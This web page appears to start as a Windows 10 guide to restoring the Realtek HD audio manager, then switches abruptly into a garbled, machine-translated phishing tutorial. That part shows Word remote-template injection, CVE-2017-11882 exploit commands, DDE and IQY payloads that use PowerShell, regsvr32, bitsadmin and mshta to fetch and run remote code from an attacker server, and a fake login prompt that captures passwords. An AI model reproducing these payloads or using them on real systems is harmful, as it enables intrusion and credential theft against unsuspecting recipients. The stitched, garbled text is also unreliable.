win10如何下载高清音频管理器? win10没有高清音频管理器问题的解决方法

2023-09-24 1259阅读

温馨提示:这篇文章已超过562天没有更新,请注意相关的内容是否还可用!

很多朋友更新win10系统后发现原来的音频管理器不见了,导致电脑失去声音。他们都在问该怎么办以及在哪里下载?今天系统城给大家带来了win10没有高清音频管理器问题的解决方法。如果有遇到同样问题的朋友可以来这里看看。以上内容都是System City为Win10高清音频管理器提供的几种情况和具体解决方案的介绍。查找并更改 settings.xml.rels 文件中的内容。

如何下载win10高清音频管理器? 很多朋友更新win10系统后发现原来的音频管理器不见了,导致电脑失去声音。 他们都在问该怎么办以及在哪里下载? 今天系统城给大家带来了win10没有高清音频管理器问题的解决方法。 如果有遇到同样问题的朋友可以来这里看看。

Win10高清音频管理器缺失的解决方法

情况一:显示方式不正确

1、打开控制面板(Win+X,点击弹出菜单中的【控制面板】);

2. 将右上角的“查看方式”更改为【大图标】。

情况2:驱动未安装

1、下载并安装第三方驱动管理软件,如:Driver Master、Driver Wizard(此处以Driver Wizard为例)

2、驱动向导打开后,点击【立即检测】;

3、检测完成后,点击Realtek HD Audio音频驱动的“安装”;

4、打开安装程序,点击【下一步】开始自动安装。 安装完成后,点击【完成】重新启动计算机;

5.重启后即可打开【realtek High Definition Audio Manager】。

情况3:realtek高清音频管理器未设置

1、首先打开开始菜单,找到里面的“控制面板”并打开。 您也可以通过快速搜索框进行查询。

2、进入控制面板后,点击进入“硬件和声音”界面。

3. 里面可以看到“realtek High Definition Audio Manager”图标,点击打开管理器设置窗口。

4.如果在控制面板中找不到此功能,可以在桌面上打开【此电脑】。 点击进入“C:\Program Files”找到Realtek“文件夹”。

5.然后进入目录“C:\Program Files\Realtek\Audio\HDA”,在里面找到“RtkNGUI64”,双击打开。

6.然后在“设置”中打开Echo,然后打开“选项”。

7. 将“插孔设置”从“HD 音频前面板”更改为“AC97”。

以上内容都是System City为Win10高清音频管理器提供的几种情况和具体解决方案的介绍。 希望对大家有所帮助。 更多相关内容请关注本站系统城感谢您的阅读!

其他避免杀戮的方法:

%E5%AE%8F%E6%94%BB%E5%87%BB%E5%8F%8A%E5%85%8D%E6%9D%80/

2.4 远程模板注入宏代码

利用Word文档加载额外模板时的缺陷发起恶意请求,以达到攻击目的。 因此,当目标用户点击攻击者发送的恶意Word文档时,就可以向远程服务器发送恶意请求,然后加载模板执行。 恶意模板的宏。

发送的文档本身不包含恶意代码,因此可以通过许多静态检测。 只需在远程DOTM文档中写入宏病毒或木马即可。

主意:

用宏代码编写一个DOTM文档并上传到服务器。 编写一个可以远程连接的DOCX文档。 压缩文档。 查找并更改 settings.xml.rels 文件中的内容。 将目标内容修改为服务器上DOTM文档的URL。 DOCX解压后的内容再以存储方式压缩为ZIP,后缀改为DOCX。 打开后可以实现宏文档的远程注入。

按照上面的Word宏钓鱼方法制作。 保存时,保存类型为dotm、fish.dotm,

打开 Web 服务并将其放入其目录中。

http://192.168.2.148:8000/hello.doc

复制

制作文档

直接下载简历

将下载的简历文件后缀由docx改为zip并解压。

将目标内容更改为[:8000/hello.doc](:8000/hello.doc),然后

选择目录中的所有文件并将电子邮件压缩为 yanmie.zip。

然后将zip后缀更改为docx。

无人机已打开,宏已启用,并准备上线。

2.5 CVE-2017-11882

适用于:

MicrosoftOffice 2000MicrosoftOffice 2003MicrosoftOffice 2007 Service Pack 3MicrosoftOffice 2010 Service Pack 2MicrosoftOffice 2013 Service Pack 1MicrosoftOffice 2016MicrosoftOffice 365

复制

Microsoft Office Word 中的任意代码执行方法,无需启用宏即可执行任意程序。

这个功能的初衷是为了更方便地更新word中其他应用程序的内容。 比如一个word文档引用了另一个excel表格中的一项,在excel中可以通过连接字段来实现。 更新word中的内容后同步word中的更新效果的问题在于,该字段的内容可以是公式(或表达式),而这个公式并不限制内容。

GitHub:

https://github.com/Ridter/CVE-2017-11882

复制

使用:

python Command109b_CVE-2017-11882.py -c"cmd.exe /c calc.exe"-otest.doc

复制

生成test.doc文档并打开目标机。Adder成功弹出

无国界医生复发。

项目

https://github.com/0x09AL/CVE-2017-11882-metasploit

复制

exploit/windows/fileformat/office_ms17_11882

复制

有点不稳定,老是上不了网。

与HTA合作上线

exploit/windows/misc/hta_server
http://192.168.2.148:8080/IbsbCdtZ.ht

复制

目标机打开test2.doc,直接上线。

2.5 在word中插入外部对象(OLE)进行欺骗

更改标题以使其更真实

双击并选择“确定”即可上线。

2.6 构建DDE钓鱼文档

创建文档 dde.docx,然后双击打开 dde.docx。 直接Ctrl+f9快捷键可以快速帮助创建域。 我们只需要在大括号中添加以下指令(会弹出一个计算器)。 在实战过程中,您可以远程加载我们的木马。

DDEAUTOc:\\windows\\system32\\cmd.exe"\/k calc.exe"

复制

计算器成功弹出。

这里我们使用ps远程下载马。

进入

DDEAUTO"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.2.148:8000/beacon.ps1'); # ""Microsoft Document Security Add-On"

复制

复制

点击是-→是-→确认后即可上线。

2.7 IQY特色钓鱼

该脚本使用 nishang 下的 Out-WebQuery.ps1 生成一个包含恶意负载 URL 的 iqy 文件。

IYQ可以简单理解为excel内置的特殊“网络浏览器”(无法加载脚本)。 通过IQY【网页查询】语句,可以直接方便地将各种网页上的列表数据导入到当前的excel中,也正是因为如此,才给了我们利用excel制作钓鱼邮件的机会。 如果你要引入的网页数据是入侵者提前准备好的一段payload iqy恶意代码,那么结果就不言而喻了。

使用流程:

新建一个excel文件,找到“数据”→“来自网站”→“地址”,填写你要抓取数据的网站的URL,并选择你要抓取数据的表单。

点击导入

点击确定导入成功

接下来用IYQ打开电脑看看效果。

在我们自己服务器的网站目录下放置一个payload.html文件,内容是IYQ代码

=cmd|'/c calc.exe '!A0

复制

下一步就是按照前面的方法在我们自己的服务器上拉取有效负载文件。

进口

单击“是”弹出计算器

保存文件并在目标机器上打开它

点击启用内容,继续点击是,就会弹出计算器。

其他方法

regsv***
=cmd|'/c regsv*** /s /n /u /i:http://ip/D4zv0M.sct scrobj.dll '!A0
bitsadmin
=cmd|'/c bitsadmin /transfer e822 http://ip/iqy %APPDATA%\e822.exe&%APPDATA%\e822.exe&del %APPDATA%\e822.exe '!A0
mshta
=cmd|'/c mshta http://ip/iqy.hta '!A0

复制

接下来执行shell shell操作

使用的工具:

nishang:https://github.com/samratashok/nishang/releases

复制

首先在kali中准备payload:

exploit/multi/script/web_delivery

复制

使用nishang中提供的Out-WebQuery脚本生成iqy文件

iqy 文件本身的内容非常简单。 只有一个 URL 包含恶意负载:关键在于该 HTML。 我们需要将 HTML 的内容替换为加载我们上面准备的 meterpreter 负载的 iqy 语句: regsv* /s /n /u /i::8080/ZTPzcY6J5.sctscrobj.dll

然后使用nishang-master\Client\Out-WebQuery.ps1生成文件

powershell-execbypass-Command"& {Import-Module ".\Out-WebQuery.ps1";Out-WebQuery -URL http://192.168.2.148:8000/msf.html}"

复制

命令执行成功后,会生成一个iqy文件

接下来,打开Web 服务目录并创建msf.html。 内容是msf刚刚生成的paylaod。

=cmd|'/c regsv*** /s /n /u /i:http://192.168.2.148:8080/ZTPzcY6J5.sct scrobj.dll '!A0

复制

接下来,你可以想办法将之前生成的iqy文件发送给受害者。

当受害者双击打开时,会默认使用Excel打开,并弹出警告。 单击以启用它。

因为之前的iqy文件是使用cmd执行的,所以会继续询问是否启动另一个应用程序CMD.EXE。

单击“是”。 正常情况下,监听的msf会生成一个会话。

利用IQY窃取目标用户密码

powershell-execbypass-Command"& {Import-Module ".\Out-WebQuery.ps1";Out-WebQuery -URL http://192.168.2.1}"

复制

powershell-execbypasscd.\UtilityImport-Module.\Start-CaptureServer.ps1Start-CaptureServer-AuthTypeBasic-IPAddress192.168..2.1-LogFilePathC:\windows\temp\log.txt# 注意此处的认证要选择基础认证,监听的 ip 和上面生成 iqy 文件中的 ip 一致,通常都是本机 i

复制

然后将上一步生成的IQY文件发送到目标无人机并打开。

该验证窗口将连续出现 3 次。 相信这三次之中总会有一个可用的账号和密码,因为目标可能根本不知道这是什么,以为是系统的账号和密码,所以就随便输入了。 其实我们主要是想用它。 此方法可用于捕获可用的 OWA 或 VPN 帐户密码。

2.8 PPT动作按钮功能结构PPSX钓鱼

新型PPT钓鱼攻击分析

首先,创建一个普通的PPTX文件,并填写一些内容,如下图:

这里需要选择空白的。 选择后,在页面中拉出一个触发位置,就会弹出动作设置界面。 选择鼠标悬停-→运行程序

msiexec.exe 是系统进程,是 Windows Installer 的一部分。 利用这个过程来加载我们的shellcode可以达到一定的规避效果。

2.9 超链接

在 PDF 或 Office 文档中嵌入跳转链接是一种非常早期的网络钓鱼方法。 通过短信的引导,要求受害者点击页面。 如果受害人不警惕,受害人的账号、密码、银行卡都有可能被获取。 、身份证等信息。

3. 电子邮件网络钓鱼

搭建邮件服务器相关环境并收集邮件信息,请参见

涵盖伪造(SRC假漏洞、简历、宏文档、合作诱因、技术交流、钓鱼网站、第三方平台)、伪造发件人、office宏钓鱼、exe诱饵等。

4、闪钓

选择域名:

源代码:

自解压或与 xss 捆绑。

详细步骤见1.6。

5. 网站钓鱼

制作钓鱼网站、克隆网站

cs和msf都有这个功能

设置工具包

VPS购买请点击我

免责声明:我们致力于保护作者版权,注重分享,被刊用文章因无法核实真实出处,未能及时与作者取得联系,或有版权异议的,请联系管理员,我们会立即处理! 部分文章是来自自研大数据AI进行生成,内容摘自(百度百科,百度知道,头条百科,中国民法典,刑法,牛津词典,新华词典,汉语词典,国家院校,科普平台)等数据,内容仅供学习参考,不准确地方联系删除处理! 图片声明:本站部分配图来自人工智能系统AI生成,觅知网授权图片,PxHere摄影无版权图库和百度,360,搜狗等多加搜索引擎自动关键词搜索配图,如有侵权的图片,请第一时间联系我们,邮箱:ciyunidc@ciyunshuju.com。本站只作为美观性配图使用,无任何非法侵犯第三方意图,一切解释权归图片著作权方,本站不承担任何责任。如有恶意碰瓷者,必当奉陪到底严惩不贷!

目录[+]